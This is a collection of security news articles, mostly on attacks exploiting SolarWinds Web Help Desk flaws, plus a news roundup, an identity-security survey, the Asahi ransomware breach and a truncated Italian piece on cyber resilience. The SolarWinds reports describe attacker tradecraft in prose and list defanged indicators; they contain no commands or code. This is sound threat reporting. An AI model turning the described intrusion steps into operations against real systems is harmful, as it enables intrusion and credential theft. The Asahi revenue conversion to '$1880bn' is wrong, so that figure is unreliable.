Hackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes, such as the Zoho ManageEngine remote monitoring and management tool. The attacker targeted at least three organizations and also leveraged Cloudflare tunnels for persistence, and the Velociraptor cyber incident response tool for command and control (C2). The malicious activity was spotted over the weekend by researchers at Huntress Security, who believe that it is part of a campaign that started on January 16 and leveraged recently disclosed SolarWinds WHD flaws. “On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control,” Huntress says. According to the cybersecurity company, the threat actor exploited the CVE-2025-40551 vulnerability, which CISA flagged last week as being used in attacks, and CVE-2025-26399. Both security problems received a critical severity rating and can be used to achieve remote code execution on the host machine without authentication. It’s worth noting that Microsoft security researchers also "observed a multi‑stage intrusion where threat actors exploited internet‑exposed SolarWinds Web Help Desk (WHD) instances," but they did not confirm exploitation of the two vulnerabilities. Attack chain and tool deployment After gaining initial access, the attacker installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform. They configured the tool for unattended access and registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The tool is used for direct hands-on keyboard activity and Active Directory (AD) reconnaissance. It was also used to deploy Velociraptor, fetched as an MSI file from a Supabase bucket. Velociraptor is a legitimate digital forensics and incident response (DFIR) tool that Cisco Talos recently warned was being abused in ransomware attacks. In the attacks observed by Huntress, the DFIR platform is used as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The researchers note that the attacker used an outdated version of the Velociraptor, 0.73.4, which is vulnerable to a privilege escalation flaw that allows increasing permissions on the host. The threat actor also installed Cloudflared from Cloudflare's official GitHub repository, using it as a secondary tunnel-based access channel for C2 redundancy. In some cases, persistence was also achieved via a scheduled task (TPMProfiler) that opens an SSH backdoor via QEMU. The attackers also disabled Windows Defender and Firewall via registry modifications to make sure that fetching additional payloads would not be blocked. "Approximately a second after disabling Defender, the threat actor downloaded a fresh copy of the VS Code binary," the researchers say. Security updates and mitigation System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product. Huntress also shared Sigma rules and indicators of compromise to help detect Zoho Assist, Velociraptor, Cloudflared, and VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution. Neither Microsoft nor Huntress attributed the observed attacks to any specific threat groups, and nothing about the targets was disclosed beyond Microsoft characterizing the breached environments as “high-value assets.” Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comFeb 9, 2026extracted
SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers
Microsoft has revealed that it observed a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization's network to other high-value assets. That said, the Microsoft Defender Security Research Team said it's not clear whether the activity weaponized recently disclosed flaws (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), or a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8). "Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold," the company said in a report published last week. While CVE-2025-40536 is a security control bypass vulnerability that could allow an unauthenticated attacker to gain access to certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could lead to remote code execution. Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to apply the fixes for the flaw by February 6, 2026. In the attacks detected by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed the attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context. "Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution," researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini noted. In the next stage, the threat actors downloaded legitimate components associated with Zoho ManageEngine, a legitimate remote monitoring and management (RMM) solution, to enable persistent remote control over the infected system. The attackers followed it up with a series of actions - Enumerated sensitive domain users and groups, including Domain Admins. Established persistence via reverse SSH and RDP access, with the attackers also attempting to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account at system startup to cover up the tracks within a virtualized environment while exposing SSH access via port forwarding. Used DLL side-loading on some hosts by using "wab.exe," a legitimate system executable associated with the Windows Address Book, to launch a rogue DLL ("sspicli.dll") to dump the contents of LSASS memory and conduct credential theft. In at least one case, Microsoft said the threat actors conducted a DCSync attack, where a Domain Controller (DC) is simulated to request password hashes and other sensitive information from an Active Directory (AD) database. To counter the threat, users are advised to keep the WHD instances up-to-date, find and remove any unauthorized RMM tools, rotate service and admin accounts, and isolate compromised machines to limit the breach. "This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored," the Windows maker said. "In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers." Update In a report published on February 8, 2026, cybersecurity company Huntress said it investigated a case of SolarWinds WHD exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as a legitimate forensics tool called Velociraptor for command-and-control (C2). The incident occurred on February 7, 2026. The following sequence of post-exploitation actions describes how the attack unfolded - Launched "cmd.exe" to install a remote MSI payload associated with Zoho ManageEngine RMM and established remote access by configuring the Zoho Assist agent for unattended access and registering the compromised host to a Zoho Assist account tied to a Proton Mail address "esmahyft@proton[.]me." Executed Active Directory discovery commands to enumerate domain-joined machines for reconnaissance. Leveraged the Zoho Assist remote session to deploy Velociraptor version 0.73.4, an outdated version with a known privilege escalation vulnerability (CVE-2025-6264). Used the Velociraptor agent to execute PowerShell commands to check for the presence of "code.exe," a Visual Studio Code binary with the likely intent of establishing a remote tunnel. Installed Cloudflared to establish an additional tunnel-based channel for redundant access to the compromised host. Executed a PowerShell script that collects comprehensive system information and transmits it directly to an attacker-controlled Elastic Cloud instance. Disabled Windows Defender and Windows Firewall via Registry modifications. Executed a script that implements a live C2 failover mechanism for the Velociraptor agent to connect it to a different server ("v2-api.mooo[.]com") if the original Cloudflare workers[.]dev domain has been detected. It achieves this by sending a request to the failover server and checking the HTTP response code. If the status is 406 Not Acceptable, the Velociraptor is reconfigured to talk to the new server. Created scheduled tasks that use QEMU to open an SSH backdoor as a persistence mechanism. "The Velociraptor server URL, https://auth.qgtxtebl.workers[.]dev/, utilizes a Cloudflare Worker from the same Cloudflare account we have seen before across multiple intrusions involving ToolShell exploitation, and Warlock ransomware deployment, identified by the shared per-account identifier component of the subdomain: qgtxtebl," Huntress researchers noted. When asked if the latest set of attacks could also be the work of the Warlock ransomware crew, given the indicators of compromise, Jamie Levy, director of adversary tactics at Huntress, told The Hacker News in an email that "there are definitely some similarities that show that this recent campaign of attacks is from the same threat actor group." This includes the "usage of the same tools and tactics post compromise," along with reused infrastructure observed in prior campaigns. "We also saw one customer come on after they had been compromised and ransomed, cementing our suspicions even further," Levy added. Threat Actor Abuses Elastic Cloud SIEM Free Trial According to a follow-up analysis published by Huntress on March 6, 2026, the aforementioned attack chain involved the threat actor exfiltrating system information to a free trial instance of Elastic Cloud security information and event management (SIEM) named "systeminfo" under their control by means of a PowerShell script. "While we have previously seen threat actors leveraging Velociraptor and other DFIR-focused tools for command and control, this was the first time we observed an adversary use Elastic Cloud for exfiltration," the company said. "The attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions. They could then triage their victims and compromised endpoints, literally using SIEM technology." The Elastic Cloud deployment was created by the threat actor on January 28, 2026, by registering their trial account with a throwaway email address likely generated using firstmail[.]ltd, a Russia-based disposable mail service. In all, the threat actor is estimated to have spent approximately 249 minutes between January 28 and February 4, 2026, running queries against victim data through the Discover interface of Kibana, an open-source data visualization and exploration tool designed for Elasticsearch. Administrative login sessions to the Elastic Cloud instance originated from the following two IP addresses - 154.26.156[.]181 51.161.152[.]26 It's worth noting that the IP address 51.161.152[.]26, an exit node associated with the Safing Privacy Network (SPN), was also flagged by Palo Alto Networks Unit 42 in July 2025 in connection with a ToolShell campaign aimed at vulnerable Microsoft SharePoint servers. The Elastic Cloud instance has been found to contain about 216 unique victim hosts that span a wide range of sectors, including government agencies, higher education institutions, financial services, religious and nonprofit organizations, global manufacturing and automotive companies, IT service providers, retail, and construction. On top of that, evidence has emerged that the threat actor has been conducting opportunistic attacks against vulnerable Gladinet CentreStack, SmarterTools SmarterMail, and Microsoft SharePoint instances as well, per Lumen Technologies Black Lotus Labs. Elastic has since taken down the instance. (The story was updated after publication to include a response from Huntress.)
thehackernews.comFeb 9, 2026extracted
Recent SolarWinds Flaws Potentially Exploited as Zero-Days
Attacks targeting internet-accessible SolarWinds Web Help Desk (WHD) instances for initial access may have exploited recently patched vulnerabilities as zero-days, Microsoft says. As part of a multi‑stage intrusion in December 2025, hackers compromised the vulnerable WHD deployments to spawn PowerShell and download and execute additional payloads. However, Microsoft says it could not confirm whether the hackers exploited new or older SolarWinds vulnerabilities known to be exploited in the wild. The tech giant says the compromised product was vulnerable to CVE-2025-40551 and CVE-2025-40536, both patched in January 2026, but also to CVE-2025-26399, which was fixed in September 2025. CVE-2025-26399, described as an unauthenticated AjaxProxy deserialization remote code execution (RCE) bug, was disclosed as a bypass for CVE-2024-28988, which was a patch bypass for CVE-2024-28986. The flawed AjaxProxy functionality is also the root cause of CVE-2025-40551. It is described as an untrusted data deserialization issue leading to unauthenticated RCE and was added to CISA’s KEV list last week. CVE-2025-40536 is a security control bypass issue that could allow attackers to create valid AjaxProxy instances and then exploit CVE-2025-40551 for RCE. “Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” Microsoft notes. The company observed the attackers obtaining persistent access by deploying the legitimate remote monitoring and management (RMM) tool ManageEngine and establishing reverse SSH and RDP access. They were also seen setting up a scheduled task to launch a QEMU virtual machine at startup with System privileges, and using the virtualized environment for evasion and SSH access via port forwarding. In some instances, they used DLL sideloading to access LSASS memory and steal credentials, and used high-privilege credentials in a DCSync attack, requesting password data from a domain controller. Organizations should immediately patch their WHD instances against the exploited vulnerabilities, find and remove unauthorized RMM applications, rotate credentials, and isolate any compromised hosts. “This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored. In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms,” Microsoft notes. Related: SmarterTools Hit by Ransomware via Vulnerability in Its Own Product Related: Organizations Urged to Replace Discontinued Edge Devices Related: VS Code Configs Expose GitHub Codespaces to Attacks Related: Critical N8n Sandbox Escape Could Lead to Server Compromise
securityweek.comFeb 9, 2026extracted
Week in review: PoC for Trend Micro Apex Central RCE released, Patch Tuesday forecast
Week in review: PoC for Trend Micro Apex Central RCE released, Patch Tuesday forecast Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Pharma’s most underestimated cyber risk isn’t a breach Chirag Shah, Global Information Security Officer & DPO at Model N examines how cyber risk in pharma and life sciences is shifting beyond traditional breaches toward data misuse, AI-driven exposure and regulatory pressure. He explains why executives still underestimate silent control failures, how ransomware groups are weaponizing compliance risk, and why proof of security will increasingly require real-time governance, not audits, as cybersecurity and compliance continue to converge. Fake Booking.com emails and BSODs used to infect hospitality staff Suspected Russian attackers are targeting the hospitality sector with fake Booking.com emails and a fake “Blue Screen of Death” to deliver the DCRat malware. The malware delivery campaign starts with phishing emails that feature room charge details in euros, which means that European organizations are likely targets. UK announces grand plan to secure online public services The UK has announced a new Government Cyber Action Plan aimed at making online public services more secure and resilient, and has allocated £210 million (approximately $283 million) to implement it. PoC released for unauthenticated RCE in Trend Micro Apex Central (CVE-2025-69258) Trend Micro has released a critical patch fixing several remotely exploitable vulnerabilities in Apex Central (on-premise), including a flaw (CVE-2025-69258) that may allow unauthenticated attackers to achieve code execution on affected installations. Recently fixed HPE OneView flaw is being exploited (CVE-2025-37164) An unauthenticated remote code execution vulnerability (CVE-2025-37164) affecting certain versions of HPE OneView is being leveraged by attackers, CISA confirmed by adding the flaw to its Known Exploited Vulnerabilities catalog. How AI agents are turning security inside-out AppSec teams have spent the last decade hardening externally facing applications, API security, software supply chain risk, CI/CD controls, and cloud-native attack paths. But a growing class of security threats is emerging from a largely underestimated and undefended source: internally built no-code assets. January 2026 Patch Tuesday forecast: And so it continues Todd Schell’s January 2026 Patch Tuesday forecast summarizes Microsoft and other vendors’ security patches and issues, examines patch management trends and processes, and outlines what to expect in next week’s Patch Tuesday releases. Understanding AI insider risk before it becomes a problem In this Help Net Security video, Greg Pollock, Head of Research and Insights at UpGuard, discusses AI use inside organizations and the risks tied to insiders. He explains two problems. One involves employees who use AI tools to speed up work but share data with unapproved services. The other involves hostile actors who use AI to gain trusted roles inside companies. What happens to insider risk when AI becomes a coworker In this Help Net Security video, Ashley Rose, CEO at Living Security, discusses how AI is changing insider risk. AI is now built into daily work across departments, which shifts how risk shows up and how security teams should respond. Rose argues that insider risk now includes AI systems, automated workflows, and agents that can take action on their own. OpenAEV: Open-source adversarial exposure validation platform OpenAEV is an open source platform designed to plan, run, and review cyber adversary simulation campaigns used by security teams. The project focuses on organizing exercises that blend technical actions with operational and human response elements, all managed through a single system. Passwords are still breaking compliance programs The security stack has grown, but audits still stumble on passwords. CISOs see this every year. An organization may have strong endpoint tools, layered network defenses, and a documented access policy. Then the audit turns to shared credentials, spreadsheet-based password storage, or accounts that no one can clearly explain. At that point, the discussion stops being about maturity and starts being about gaps. Turning plain language into firewall rules Firewall rules often begin as a sentence in someone’s head. A team needs access to an application. A service needs to be blocked after hours. Translating those ideas into vendor specific firewall syntax usually involves detailed knowledge of zones, objects, ports, and rule order. New research from New York University examines a different starting point, one that treats natural language as the entry point for firewall configuration. Gen AI data violations more than double Security teams track activity that moves well beyond traditional SaaS platforms, with employees interacting daily with generative AI tools, personal cloud services, and automated systems that exchange data without direct human input. These patterns shape how sensitive information moves across corporate environments and where security controls apply. When AI agents interact, risk can emerge without warning System level risks can arise when AI agents interact over time, according to new research that examines how collective behavior forms inside multi agent systems. The study finds that feedback loops, shared signals, and coordination patterns can produce outcomes that affect entire technical or social systems, even when individual agents operate within defined parameters. These effects surface through interaction itself, which places risk in the structure of the system and how agents influence one another. Voice cloning defenses are easier to undo than expected Many voice protection tools promise to block cloning by adding hidden noise to speech. Researchers at a Texas university found that widely used voice protection methods can be stripped away, restoring speaker identity and allowing fake voices to pass automated checks. Passwords are where PCI DSS compliance often breaks down Most PCI DSS failures do not start with malware or a targeted attack. They start with everyday behavior. Reused passwords. Credentials stored in spreadsheets. Shared logins are passed around during busy periods. For CISOs, password hygiene remains one of the least technical and most difficult parts of compliance. European Commission opens consultation on EU digital ecosystems The European Commission has opened a public call for evidence on European open digital ecosystems, a step toward a planned Communication that will examine the role of open source in EU’s digital infrastructure. AI security risks are also cultural and developmental Security teams spend much of their time tracking vulnerabilities, abuse patterns, and system failures. A new study argues that many AI risks sit deeper than technical flaws. Cultural assumptions, uneven development, and data gaps shape how AI systems behave, where they fail, and who absorbs the harm. What security teams miss in email attacks Email remains the most common entry point for attackers. This article examines how phishing, impersonation, and account takeover continue to drive email breaches and expose growing security gaps across industries. Product showcase: Blokada for Android gives users control over network traffic Blokada is a network privacy and ad-blocking application available on Android, iOS, Windows, macOS, and Linux. It is designed to reduce ads, block trackers, and limit unwanted network connections at the system level. The roles and challenges in moving to quantum-safe cryptography A new research project examines how organizations, regulators, and technical experts coordinate the transition to quantum safe cryptography. The study draws on a structured workshop with public sector, private sector, and academic participants to document how governance, security, and innovation systems shape cryptographic migration planning. Identity security planning for 2026 is shifting under pressure Identity security planning is becoming more focused on scale, governance, and operational strain, according to the Identity Security Outlook 2026 report. The ManageEngine research draws on responses from 515 identity and security leaders in the United States and Canada and reflects budget holders and practitioners who manage day-to-day identity systems. The findings point to three forces shaping near-term strategy: growth in non-human identities, uneven use of AI in identity operations, and sustained momentum toward vendor consolidation. What European security teams are struggling to operationalize European security and compliance teams spend a lot of time talking about regulation. A new forecast report from Kiteworks suggests the harder problem sits elsewhere. According to the report, many European organizations have strong regulatory frameworks on paper, driven by GDPR and upcoming AI rules, and weaker operational systems that show how those rules work in daily practice. The gap, the report argues, shows up in areas like AI incident response, supply chain visibility, and compliance automation as organizations move toward 2026. Debian seeks volunteers to rebuild its data protection team The Debian Project is asking for volunteers to step in after its Data Protection Team became inactive. All three members of the team stepped down at the same time, leaving no dedicated group to handle privacy and data protection work. StackRox: Open-source Kubernetes security platform Security teams spend a lot of time stitching together checks across container images, running workloads, and deployment pipelines. The work often happens under time pressure, with engineers trying to keep clusters stable while meeting internal policy requirements. The StackRox open source project sits in that space, offering a Kubernetes security platform that teams can run and adapt on their own. Cybercriminals are scaling phishing attacks with ready-made kits Phishing-as-a-Service (PhaaS) kits lower the barrier to entry, enabling less-skilled attackers to run large-scale, targeted phishing campaigns that impersonate legitimate services and institutions, according to Barracuda Networks. IPFire update brings new network and security features to firewall deployments Security and operations teams often work with firewall platforms that require frequent tuning or upgrades to meet evolving network demands. IPFire has released its 2.29 Core Update 199, aimed at network and protection teams that manage this open source firewall distribution. Wi-Fi evolution tightens focus on access control Wi-Fi networks are taking on heavier workloads, more devices, and higher expectations from users who assume constant access everywhere. A new Wireless Broadband Alliance industry study shows that this expansion is reshaping priorities around security, identity, and trust, alongside adoption of new Wi-Fi standards. Security teams are paying more attention to the energy cost of detection Security teams spend a lot of time explaining why detection systems need more compute. Cloud bills rise, models retrain more often, and new analytics pipelines get added to existing stacks. Those conversations usually stay focused on coverage and accuracy. A recent study takes a different approach by measuring anomaly detection models alongside their energy use and associated carbon output, treating compute consumption as part of security operations. Product showcase: TrackerControl lets Android users see who’s tracking them TrackerControl is an open-source Android application designed to give users visibility into and control over the hidden data within mobile apps. Many apps routinely communicate with third-party services that collect information about usage. TrackerControl makes this activity visible and allows users to decide what should be blocked.
helpnetsecurity.comJan 11, 2026extracted
Identity security planning for 2026 is shifting under pressure
Identity security planning for 2026 is shifting under pressure Identity security planning is becoming more focused on scale, governance, and operational strain, according to the Identity Security Outlook 2026 report. The ManageEngine research draws on responses from 515 identity and security leaders in the United States and Canada and reflects budget holders and practitioners who manage day-to-day identity systems. The findings point to three forces shaping near-term strategy: growth in non-human identities, uneven use of AI in identity operations, and sustained momentum toward vendor consolidation. Non-human identities dominate identity growth The report shows that machine identities now outnumber human identities by wide margins across most organizations. Service accounts, API keys, bots, agents, and certificates continue to multiply as automation, cloud platforms, and DevOps pipelines expand. Nearly half of surveyed organizations report machine-to-human ratios above 100:1, and some sectors report ratios reaching 500:1. This growth places pressure on identity teams that rely on manual processes. Only 12 percent of respondents report automated life cycle management for machine identities. Many organizations depend on ad hoc tracking or periodic reviews. Survey data links high machine identity ratios with increased operational risk when discovery, ownership, and expiration policies remain inconsistent. Researchers also highlights a gap between executive perception and practitioner experience. Senior leaders often report high levels of visibility into machine identities. Practitioners report lower confidence in tracking coverage and governance depth. Aggregated dashboards and compliance metrics contribute to this gap by emphasizing coverage counts without context about privilege levels or account activity. AI adoption remains uneven across identity programs AI appears widely across identity roadmaps, with 91 percent of organizations piloting or using AI in identity and access management functions. Organization-wide deployment remains limited, with only 7 percent reporting broad operational use. Most deployments remain confined to specific functions such as anomaly detection or automated provisioning. The report identifies a measurable optimism gap. About two-thirds of respondents express confidence in AI’s future value for identity security. Fewer than half report positive outcomes today. This difference reflects implementation challenges tied to data quality, explainability, and integration complexity. Identity teams require traceable reasoning when AI systems recommend access changes or flag anomalous behavior. Regulatory expectations reinforce this requirement. Skill availability also influences AI outcomes. Identity security AI requires combined expertise in IAM operations and data science disciplines. Survey responses suggest many organizations pursue AI to extend limited staff capacity. Implementation still requires tuning, monitoring, and ongoing governance by skilled personnel. Fragmented identity stacks drive consolidation plans Tool fragmentation continues to shape operational workload. Nearly three quarters of organizations operate multiple identity platforms, and one in three report spending more time managing vendors than managing privileged users. The report describes a complexity threshold that emerges once a second or third identity system enters the environment. Integration effort, policy coordination, and training overhead increase at that point. Vendor consolidation has moved from debate to planning and execution. Seventy-six percent of respondents report active consolidation or evaluation efforts. Support spans executive leadership and operational management, though motivations differ. Executives often focus on governance consistency and cost structure. Practitioners focus on reducing coordination overhead and workflow friction. Execution challenges remain. Migration complexity, contract timing, and resource constraints slow progress. Organizations further along in consolidation efforts report phased timelines measured in years and rely on temporary staffing or external expertise to protect operational stability during transitions. Budgets remain stable with shifting priorities Identity security budgets show stability across regions. More than 90 percent of respondents expect budgets to grow or remain steady through 2026. Reported budget reductions often stem from platform rationalization and licensing consolidation. Survey data links these changes to reallocation patterns rather than reduced identity coverage. Investment priorities emphasize integration, AI analytics, zero trust initiatives, and non-human identity governance. Consolidation ranks lower as a standalone line item since many organizations treat it as an architectural outcome rather than a discrete purchase. The report also notes alignment between reported challenges and spending plans, particularly around governance gaps and compliance pressure. Talent scarcity shapes architectural decisions Across sections, the report returns to workforce constraints. Shortages of experienced IAM professionals influence decisions around consolidation, automation, and AI adoption. Organizations report difficulty hiring specialists for fragmented stacks that require platform-specific expertise. Simplified architectures reduce training burden and enable teams to focus on monitoring and response activities. “When non-human identities outnumber humans by orders of magnitude, the likes of which we see today, traditional governance approaches collapse. Organizations must fundamentally rethink how they manage and secure these identities before the scale becomes completely unmanageable,” said Ramanathan Kannabiran, director of product management at ManageEngine.
helpnetsecurity.comJan 7, 2026extracted
Asahi Confirms 1.5 Million Customers Affected in Major Cyber-Attack
Brewing giant Asahi said that almost two million people could have seen their personal data exposed after it suffered a major cyber-attack in September 2025. In a new advisory, published on November 27, Asahi shared the early results of the investigation into the cyber-attack that led to temporary operation suspensions in September and October. The probe concluded that the personal data of approximately 1.914 million individuals, including 1.525 million customers, was or may have been exposed. The remaining affected individuals include current and former employees of Asahi Group Holdings, their family members and “external contacts who received congratulatory or condolence telegrams” from the company. Potentially exposed data include: Names Genders Dates of birth Postal Addresses Email addresses Phone numbers Asahi confirmed that credit card information has not been exposed. Expected Further Operation Disruptions Asahi said it spent two months investigating the breach - including conducting root cause analysis and integrity checks –, containing the ransomware, restoring systems and strengthening security to prevent future incidents. Atsushi Katsuki, President and Group CEO of Asahi Group Holdings, publicly apologized for the difficulties caused by the disruptions. “We are making every effort to achieve full system restoration as quickly as possible, while implementing measures to prevent recurrence and strengthening information security across the group. Regarding product supply, shipments are resuming in stages as system recovery progresses,” he added. Kevin Marriott, senior manager of cyber at Immersive, emphasized that the theft of customer data “only adds further pressure that the Asahi team is facing, in addition to the possibility that operations may not be fully restored until February.” Potential Hit to Asahi’s 2025 Revenues Asahi Group Holdings is a giant beer making conglomerate that owns several brands, including a range of Asahi-branded beers, Italian beer Peroni, Czech beer Pilsner Urquell and Hungarian beer Dreher. The group’s global disclosed a 2024 global revenue of ¥2939.4bn ($1880bn) – a 2.1% increase compared to 2023. The potential impact of the incident on Asahi’s financial results for fiscal year 2025 is currently under review. Shankar Haridas, head of UK and Ireland at ManageEngine, noticed that Asahi had already acknowledged in its 2024 report that such an attack could interrupt business and was reviewing its security posture. “That reflects a wider truth that companies are investing more than ever in digital defences, yet adversaries continue to outpace them, exploiting weak links in supply chains or breaking in through trusted partners,” he added. Qilin Ransomware Group Claimed the Cyber-Attack Asahi temporarily suspended its operations in Japan in late September following a “system failure.” Disruptions included order and shipment, call centers and customer service desks. The beer giant later confirmed the incident was due to a ransomware attack which resulted in an “unauthorized transfer of data” from its servers. It continued to experience operation disruptions throughout October. The company also postponed the launch of a new product scheduled to be released in October due to the cyber-attack. On October 7, consumer website Comparitech revealed that the Qilin ransomware group had listed Asahi on its data leak site, claiming to have stolen 27 GB of files from the company. Qilin is known for double-extortion attacks, leaking data when it has not received payment from its victims. “Customers should therefore keep an eye on updates as the situation evolves and be cautious of any unsolicited communication over the coming months,” Immersive’s Marriot, warned. Jason Revill, global security practice technology lead at Avanade, added that the Asahi cyber-attack “highlights a growing risk in operational technology (OT)/information technology (IT) coverage networks, and why Zero Trust principles are critical for every organization, no matter the size or industry.” “The compromise seems to have started with network equipment at one site, impacting the OT environment and potentially expanding into IT systems, wherein customer data was exposed,” he explained. Photo credits: Tom Eversley / Hendrick Wu / Shutterstock
infosecurity-magazine.comNov 27, 2025extracted
Cyber resilience nell’era dell’autonomous IT: come superare l’alert fatigue
Nel panorama della sicurezza informatica, il concetto di cyber resilience (la capacità di un’azienda di opporre resistenza, adattarsi e recuperare rapidamente l’operatività in seguito ad attacchi informatici) si sta imponendo come metrica di maturità digitale. Non basta più prevenire gli attacchi: bisogna saper reagire, adattarsi e ripristinare la continuità in tempi rapidi. Come ha spiegato Rajesh Ganesan – Ceo di ManageEngine – durante il ManageEngine User Conference 2025, «tutte le organizzazioni devono partire dal presupposto di essere costantemente sotto attacco». È una consapevolezza maturata dopo anni di escalation nei volumi di alert, segnali di intrusione e falsi positivi che, anziché migliorare la sicurezza, rischiano di comprometterla per sovraccarico informativo e stanchezza operativa. Indice degli argomenti Dall’iperallarme alla resilienza operativa Il fenomeno dell’alert fatigue è oggi uno dei principali fattori di vulnerabilità delle aziende digitali. Secondo Ganesan, i Security Operation Center (SOC) – le strutture deputate al monitoraggio degli eventi di sicurezza – si trovano spesso a dover gestire migliaia di segnalazioni ogni giorno, con una proporzione di falsi positivi superiore ai casi reali di minaccia. Questa asimmetria genera un paradosso: più sistemi di monitoraggio vengono implementati, più aumenta la quantità di dati da filtrare manualmente. «Le aziende dispongono di strumenti avanzati di detection e alerting, ma il problema non è tecnologico», ha spiegato Ganesan. «È la capacità di triage a determinare l’efficacia della risposta. Quando un team deve analizzare mille segnali e solo venti sono realmente pericolosi, l’errore umano diventa inevitabile». Da questa stanchezza cognitiva – l’alert fatigue, appunto – nascono molti dei casi di ransomware (i virus del riscatto) e violazioni di rete che finiscono sulle cronache internazionali. L’obiettivo della cyber resilience, quindi, non è solo prevenire gli attacchi, ma costruire un sistema capace di reggere all’urto dell’imprevisto. È la stessa logica che Ganesan applica all’intero ciclo della trasformazione digitale: «La resilienza è l’unica costante. Non puoi evitare i fallimenti, ma puoi imparare a riprendere il controllo in tempi rapidi». Con l’aumento della complessità infrastrutturale – tra ambienti cloud, dispositivi mobili e sistemi ibridi – la capacità di reagire agli incidenti non può più dipendere solo da operatori umani. La cyber resilience, spiega Ganesan, nasce dalla combinazione tra intelligenza umana e automazione intelligente: l’autonomous IT (che si riferisce a sistemi e processi IT operanti con intervento umano minimo o nullo, sfruttando l’AI e l’automazione per la gestione in autonomia di attività come la configurazione, la manutenzione, la sicurezza e la risoluzione dei problemi). Nel modello delineato dal CEO di ManageEngine, l’idea non è sostituire gli analisti, ma affiancarli con “digital employee” capaci di svolgere compiti ripetitivi e di triage iniziale. Questi agenti digitali, costruiti secondo principi di intelligenza adattiva, analizzano i flussi di allarme, eliminano i duplicati, correlano eventi e segnalano solo i pattern anomali più rilevanti. «Il valore non sta nel numero di sistemi di difesa – osserva Ganesan – ma nella capacità di interpretarli insieme, in modo coerente e tempestivo». La visione rimanda a una tendenza più ampia nell’industria della sicurezza IT: il passaggio dai Security Operation Center tradizionali agli Autonomous SOC, dove le piattaforme di automazione e intelligenza artificiale collaborano con i team di analisti. Questo modello riduce i tempi medi di detection e response, ma soprattutto libera il capitale umano per le attività a maggiore valore aggiunto, come l’analisi predittiva e la simulazione di scenari d’attacco. Comprendere la complessità per progettare resilienza Per Ganesan, la sicurezza informatica è un problema di conoscenza più che di potenza di calcolo. La cyber resilience si fonda sulla consapevolezza di cosa può fallire, non sulla presunzione di invulnerabilità. L’idea riprende un principio ricorrente nei suoi interventi: l’importanza dei fondamentali. «Quando parliamo di intelligenza artificiale o automazione, dobbiamo sempre tornare ai primi principi», afferma Ganesan. «Se non comprendiamo come funziona un modello, dove passano i dati e come vengono utilizzati, non potremo mai difenderli davvero». Questa affermazione, apparentemente di buon senso, traduce una verità profonda: non esiste resilienza senza trasparenza. Le aziende che adottano soluzioni di automazione devono sapere dove si trovano le loro vulnerabilità, come circola l’informazione e chi può accedervi. La cyber resilience, in questo senso, non è un obiettivo statico ma un processo di apprendimento continuo, che si rinnova ogni volta che la superficie d’attacco cambia. Dalla prevenzione alla risposta: la lezione della resilienza Nel discorso di Milano, Ganesan ha raccontato un dato emblematico: «Siamo costantemente sotto attacco. Subiamo attacchi DDoS ventiquattr’ore su ventiquattro». La frase fotografa una realtà diffusa: la difesa perfetta non esiste, e il vero vantaggio competitivo risiede nella rapidità di reazione. Per questo motivo, la cyber resilience non coincide con la sicurezza in senso stretto, ma con la capacità organizzativa di mantenere la continuità operativa anche in caso di violazione. Significa non solo isolare l’incidente, ma garantire che le funzioni critiche – dai sistemi di pagamento ai servizi ai clienti – restino attive o possano essere ripristinate in tempi brevi. La differenza tra un’azienda vulnerabile e una resiliente, sottolinea Ganesan, sta nella capacità di imparare dall’attacco. Ogni evento di sicurezza diventa così una fonte di dati che alimenta i modelli di difesa futuri, riducendo progressivamente la superficie di rischio. È un ciclo virtuoso che trasforma la minaccia in apprendimento, e l’automazione in memoria collettiva. L’alert fatigue come sintomo culturale Oltre alla dimensione tecnica, il tema dell’alert fatigue rivela una componente culturale. In molte organizzazioni, la sicurezza è ancora percepita come un compartimento separato, un insieme di procedure che convivono accanto al business ma non dentro di 